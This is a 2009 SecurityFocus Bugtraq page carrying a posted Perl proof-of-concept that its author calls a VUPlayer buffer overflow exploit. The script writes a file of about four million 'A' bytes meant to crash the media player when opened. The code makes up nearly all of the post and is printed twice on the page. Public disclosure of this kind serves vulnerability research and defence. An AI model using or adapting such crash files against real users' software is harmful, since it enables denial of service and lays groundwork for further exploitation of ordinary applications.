Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Beta Programs
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
BugTraq
Back to list
|
Post reply
VUPLAYER BufferOver flow POC
Jan 06 2009 08:08PM
alphanix00 gmail com
#!/usr/bin/perl
system("color 3");
if (@ARGV != 1) { &help; exit(); }
sub help(){
print "[X] Usage : ./exploit.pl filename \n";
}
{ $file = $ARGV[0]; }
print "\n [X]*******************************************\n";
print " [X] VUPLAYER BufferOver flow POC *\n";
print " [X] Coded By AlpHaNiX *\n";
print " [X] From Null Area *\n";
print " [X]*******************************************\n\n";
print "[+] Exploiting.....\n" ;
my $buff="\x41\x41\x41\x41" x 1000000 ;
print "[+] Creating Evil File" ;
open($FILE, ">>$file") or die "Cannot open $file";
print $FILE $buff;
close($FILE);
print "\n[+] Please wait while creating $file";
print "\n[+] $file has been created";
[ reply ]
Privacy Statement
Copyright 2009, SecurityFocus
system("color 3");
if (@ARGV != 1) { &help; exit(); }
sub help(){
print "[X] Usage : ./exploit.pl filename \n";
}
{ $file = $ARGV[0]; }
print "\n [X]*******************************************\n";
print " [X] VUPLAYER BufferOver flow POC *\n";
print " [X] Coded By AlpHaNiX *\n";
print " [X] From Null Area *\n";
print " [X]*******************************************\n\n";
print "[+] Exploiting.....\n" ;
my $buff="\x41\x41\x41\x41" x 1000000 ;
print "[+] Creating Evil File" ;
open($FILE, ">>$file") or die "Cannot open $file";
print $FILE $buff;
close($FILE);
print "\n[+] Please wait while creating $file";
print "\n[+] $file has been created";
[ reply ]